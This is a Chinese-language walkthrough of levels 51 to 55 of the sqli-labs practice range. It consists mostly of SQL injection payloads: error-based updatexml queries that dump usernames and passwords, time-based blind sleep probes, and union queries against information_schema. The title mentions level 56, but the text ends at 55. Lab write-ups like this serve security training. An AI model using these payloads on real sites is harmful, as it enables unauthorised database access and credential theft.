sqli-labs靶场通关攻略（五十一到五十六关）

sqli-labs-master靶场第五十一关

步骤一，尝试输入?sort=1'

我们发现这关可以报错注入

步骤二，爆库名

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

步骤三，爆表名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

步骤四，爆users列名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

步骤五，爆users表中信息

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1) --+

sqli-labs-master靶场第五十二关

步骤一，这关的参数是sort，输入?sort=1--+

步骤二，查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

以此类推...最终得出数据库名为security

步骤三，查看表名

查security数据库中第一张表的第一位字符

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推...最终得出第一张表的表名为emails

sqli-labs-master靶场第五十三关

步骤一，这关的参数是sort，输入?sort=1'--+

步骤二，查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

以此类推...最终得出数据库名为security

步骤三，查看表名

查security数据库中第一张表的第一位字符

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推...最终得出第一张表的表名为emails

sqli-labs-master靶场第五十四关

步骤一，查看数据库

?id=-1'union select 1,2,database()--+

步骤二，查看表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三，查看users表中列名

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

sqli-labs-master靶场第五十五关

步骤一，查看数据库

?id=-1)union select 1,2,database()--+

步骤二，查看表名

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三，查看users表中列名

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+